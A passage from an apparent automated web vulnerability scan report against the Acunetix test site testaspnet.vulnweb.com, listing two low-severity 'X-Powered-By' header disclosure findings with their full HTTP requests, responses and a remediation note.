        6. GET http://testaspnet.vulnweb.com/Comments.aspx?id=0
          Alert tags
          Alert description

          The web/application server is leaking information via one or more "X-Powered-By" HTTP response headers. Access to such information may facilitate attackers identifying other frameworks/components your web application is reliant upon and the vulnerabilities such components may be subject to.

          Request
          Request line and header section (322 bytes)
          GET http://testaspnet.vulnweb.com/Comments.aspx?id=0 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:18 GMT
          Content-Length: 13707
          
          
          Response body (13707 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>Comments</title>
          		<meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1">
          		<meta name="CODE_LANGUAGE" Content="C#">
          		<meta name="vs_defaultClientScript" content="JavaScript">
          		<meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="Comments.aspx?id=0" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTg2MjcwMzE2Mg9kFgICAQ9kFggCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WBB8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fucx8ABRJSZWFkTmV3cy5hc3B4P2lkPTBkAgcPFgIfAQVEU2VhbWxlc3MgT3BlblZBUyBpbnRlZ3JhdGlvbiBub3cgYWxzbyBhdmFpbGFibGUgb24gV2luZG93cyBhbmQgTGludXhkZD0ABLMUBs9bepCq8oSQPQHk/TUy" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="58A73C4D" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWQKDytHbBQKAgcfvBQKFzrr8AQK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q9zWSYY5iwxqgBHXlBfPJ/1TT/YMA==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>5/16/2019 12:32:30 PM</DIV>
          						<a href="ReadNews.aspx?id=0" id="anchNewsTitle" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a>
          						<DIV id="divNewsShort" class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV>
          						<div id="divComments">User comments:
          							<table id="tblComments" cellspacing="0" cellpadding="0" width="500" border="0">
          </table>
          
          						</div>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<textarea name="tbComment" rows="2" cols="20" id="tbComment" class="CommentTA"></textarea>
          									<input type="submit" name="btnSend" value="Send comment" id="btnSend" /></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          					</TD>
          					<TD vAlign="top" width="200">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="2"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          X-Powered-By: ASP.NET
          Solution

          Ensure that your web server, application server, load balancer, etc. is configured to suppress "X-Powered-By" headers.

        7. GET http://testaspnet.vulnweb.com/Comments.aspx?id=2
          Alert tags
          Alert description

          The web/application server is leaking information via one or more "X-Powered-By" HTTP response headers. Access to such information may facilitate attackers identifying other frameworks/components your web application is reliant upon and the vulnerabilities such components may be subject to.

          Request
          Request line and header section (322 bytes)
          GET http://testaspnet.vulnweb.com/Comments.aspx?id=2 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:18 GMT
          Content-Length: 14245
          
          
          Response body (14245 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>Comments</title>
          		<meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1">
          		<meta name="CODE_LANGUAGE" Content="C#">
          		<meta name="vs_defaultClientScript" content="JavaScript">
          		<meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="Comments.aspx?id=2" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTg2MjcwMzE2Mg9kFgICAQ9kFggCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WBB8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT8fAAUSUmVhZE5ld3MuYXNweD9pZD0yZAIHDxYCHwEFrAIyMSBKdWx5IDIwMDUgLSBTdGFydC11cCBjb21wYW55IEFjdW5ldGl4IHJlbGVhc2VkIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXI6IGEgdG9vbCB0byBhdXRvbWF0aWNhbGx5IGF1ZGl0IHdlYnNpdGUgc2VjdXJpdHkuIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgMiBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUsIGxhdW5jaGVzIHBvcHVsYXIgd2ViIGF0dGFja3MgKFNRTCBJbmplY3Rpb24gZXRjLikgYW5kIGlkZW50aWZpZXMgdnVsbmVyYWJpbGl0aWVzIHRoYXQgbmVlZCB0byBiZSBmaXhlZC5kZLQBJ3hOt3r5jKtYjVFFKdowCSWC" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="58A73C4D" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWQKpxZClDQKAgcfvBQKFzrr8AQK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q/pbihq93nLJJrCcGURk6iWNCIK+A==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>11/8/2005 11:35:22 AM</DIV>
          						<a href="ReadNews.aspx?id=2" id="anchNewsTitle" class="NewsTitle">Web attacks - can your web applications withstand the force?</a>
          						<DIV id="divNewsShort" class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV>
          						<div id="divComments">User comments:
          							<table id="tblComments" cellspacing="0" cellpadding="0" width="500" border="0">
          </table>
          
          						</div>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<textarea name="tbComment" rows="2" cols="20" id="tbComment" class="CommentTA"></textarea>
          									<input type="submit" name="btnSend" value="Send comment" id="btnSend" /></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          					</TD>
          					<TD vAlign="top" width="200">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="2"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;bottom:2px;text-align:center;font-size:12px;padding:1px">
